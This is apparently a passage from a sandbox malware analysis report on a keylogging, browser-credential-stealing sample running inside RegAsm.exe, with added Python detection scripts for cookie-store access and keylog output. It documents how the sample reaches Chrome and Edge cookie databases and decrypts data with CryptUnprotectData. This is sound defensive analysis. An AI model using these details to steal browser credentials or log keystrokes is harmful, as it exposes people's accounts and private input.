                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
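The two function records above, together with the `/sort "Visit Time" /stext ` command-line fragment earlier in this section, pin down the exact artefacts of the sample's browser-data theft: PathFileExistsW probes for the Chrome and Edge `Network\Cookies` databases under `Default` and numbered `Profile` directories, and a NirSoft-style history export switch set. The Python below is an added detection example, not part of the Joe Sandbox report or of the sample. It runs those indicators over constructed file-access and process-creation events (the event dictionaries, the user name, the `tool.exe` path and the PIDs are invented for illustration) and flags a non-browser process opening a cookie store, a browser opening another browser's store, and any command line carrying the history-dump switches.

```python
import re

# Cookie-store paths the sample probes with PathFileExistsW:
#   \AppData\Local\Google\Chrome\  or  \AppData\Local\Microsoft\Edge\
#   + User Data\Default\Network\Cookies  or  User Data\Profile ?\Network\Cookies
# The "?" in the report is the profile number; any digit run is accepted here.
COOKIE_DB_RE = re.compile(
    r"\\AppData\\Local\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\"
    r"(?:Default|Profile \d+)\\Network\\Cookies$",
    re.IGNORECASE,
)

# The one image expected to open each store (assumption: no sync or backup agents).
STORE_OWNER = {r"google\chrome": "chrome.exe", r"microsoft\edge": "msedge.exe"}

# History-export switches taken from the sample's strings ('/sort "Visit Time" /stext ').
HISTORY_DUMP_RE = re.compile(r'/sort\s+"Visit Time"\s+/stext\s+', re.IGNORECASE)


def _basename(image_path):
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (rule, pid, detail) tuples for events matching the indicators above."""
    alerts = []
    for ev in events:
        image = _basename(ev.get("image", ""))
        if ev["type"] == "file_access":
            m = COOKIE_DB_RE.search(ev["path"])
            # Anything but the owning browser touching its cookie DB is worth a look.
            if m and STORE_OWNER[m.group(1).lower()] != image:
                alerts.append(("cookie_db_access", ev["pid"], ev["path"]))
        elif ev["type"] == "process_create":
            if HISTORY_DUMP_RE.search(ev.get("cmdline", "")):
                alerts.append(("history_dump_cmdline", ev["pid"], ev["cmdline"]))
    return alerts


# Constructed events with Sysmon-like fields (invented for this example).
U = r"C:\Users\alice\AppData\Local"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    # injected RegAsm.exe reading the Chrome default-profile cookie DB -> alert
    {"type": "file_access", "pid": 4120, "image": REGASM,
     "path": U + r"\Google\Chrome\User Data\Default\Network\Cookies"},
    # Chrome reading its own store -> benign
    {"type": "file_access", "pid": 2200, "image": CHROME,
     "path": U + r"\Google\Chrome\User Data\Default\Network\Cookies"},
    # RegAsm.exe reading a numbered Edge profile -> alert
    {"type": "file_access", "pid": 4120, "image": REGASM,
     "path": U + r"\Microsoft\Edge\User Data\Profile 2\Network\Cookies"},
    # Chrome reading the Edge store -> alert (cross-browser access)
    {"type": "file_access", "pid": 2200, "image": CHROME,
     "path": U + r"\Microsoft\Edge\User Data\Default\Network\Cookies"},
    # RegAsm.exe reading a non-cookie file -> not covered by this rule
    {"type": "file_access", "pid": 4120, "image": REGASM,
     "path": U + r"\Google\Chrome\User Data\Default\Preferences"},
    # history-dump switches on a dropped tool (tool name is a placeholder) -> alert
    {"type": "process_create", "pid": 4388, "image": U + r"\Temp\tool.exe",
     "cmdline": '"' + U + r'\Temp\tool.exe" /sort "Visit Time" /stext ' + U + r"\Temp\h.txt"},
]

if __name__ == "__main__":
    for rule, pid, detail in triage(SAMPLE_EVENTS):
        print(rule, pid, detail)
```

The cookie rule keys on the exact path layout the sample walks rather than on the word "Cookies" alone, which keeps it quiet on profile backups and extension storage; pair it with a parent-process check on RegAsm.exe (its legitimate parent is a .NET installer or build step, not mshta.exe or powershell.exe) for higher confidence.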
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventLocalTimewsprintf
                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                • API String ID: 1497725170-1359877963
                                                                • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                • String ID: Online Keylogger Started
                                                                • API String ID: 112202259-1258561607
                                                                • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
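The two records above give the shape of the sample's keylogger output: a thread announced with the marker string `Online Keylogger Started`, and entries stamped by wsprintfW with `[%04i/%02i/%02i %02i:%02i:%02i ` followed by `]` from GetLocalTime. The Python below is an added example, not part of this report or of the sample. It parses plaintext keylog data of that shape into timestamped records and offers a quick heuristic for spotting such data in a memory or file dump. It assumes that the foreground window title is what sits between the timestamp and the closing bracket (the report shows only the format strings, not what fills the gap), and the sample text is constructed.

```python
import re
from datetime import datetime

# Marker written when the online keylogger thread starts (string from the sample).
START_MARKER = "Online Keylogger Started"

# Entry header built by wsprintfW("[%04i/%02i/%02i %02i:%02i:%02i ") + "]".
# Assumption (not shown by the report): the foreground window title fills the gap.
ENTRY_RE = re.compile(r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*)\]$")


def parse_keylog(text):
    """Split plaintext keylog data into dicts: time, title, keys (raw keystroke text)."""
    records = []
    current = None
    for line in text.splitlines():
        if line.strip() == START_MARKER:
            continue  # session marker, no keystrokes attached to it
        m = ENTRY_RE.match(line)
        if m:
            if current is not None:
                records.append(current)
            y, mo, d, h, mi, s = (int(g) for g in m.groups()[:6])
            current = {"time": datetime(y, mo, d, h, mi, s),
                       "title": m.group(7).strip(), "keys": ""}
        elif current is not None:
            # Everything until the next header is keystroke text for this window.
            current["keys"] += line + "\n"
    if current is not None:
        records.append(current)
    return records


def looks_like_remcos_keylog(text, min_entries=2):
    """Triage heuristic: the start marker, or several well-formed entry headers."""
    if START_MARKER in text:
        return True
    return sum(1 for line in text.splitlines() if ENTRY_RE.match(line)) >= min_entries


# Constructed sample shaped after the format strings above (not captured output).
SAMPLE_LOG = (
    "Online Keylogger Started\n"
    "[2024/10/14 09:12:33 Untitled - Notepad]\n"
    "hello world\n"
    "[2024/10/14 09:13:01 Sign in]\n"
    "alice\n"
    "hunter2\n"
)

if __name__ == "__main__":
    for rec in parse_keylog(SAMPLE_LOG):
        print(rec["time"], repr(rec["title"]), repr(rec["keys"]))
```

Run the heuristic over strings extracted from the RegAsm.exe memory region (0x400000 here) before the parser; the marker alone is enough to confirm a live keylogger thread, while the header count catches older logs whose marker line has already scrolled out of the buffer.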
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: CryptUnprotectData$crypt32
                                                                • API String ID: 2574300362-2380590389
                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                • String ID: Connection Timeout
                                                                • API String ID: 2055531096-499159329
                                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Exception@8Throw
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 2005118841-1866435925
                                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                APIs
                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                                • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                • String ID: bad locale name
                                                                • API String ID: 3628047217-1405518554
                                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                  • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                • String ID: !D@
                                                                • API String ID: 186401046-604454484
                                                                • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: /C $cmd.exe$open
                                                                • API String ID: 587946157-3896048727
                                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                APIs
                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                • String ID: pth_unenc
                                                                • API String ID: 3123878439-4028850238
                                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetCursorInfo$User32.dll
                                                                • API String ID: 1646373207-2714051624
                                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetLastInputInfo$User32.dll
                                                                • API String ID: 2574300362-1519888992
                                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __alldvrm$_strrchr
                                                                • String ID:
                                                                • API String ID: 1036877536-0
                                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                • __freea.LIBCMT ref: 100087D5
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                • String ID:
                                                                • API String ID: 2652629310-0
                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                APIs
                                                                Strings
                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
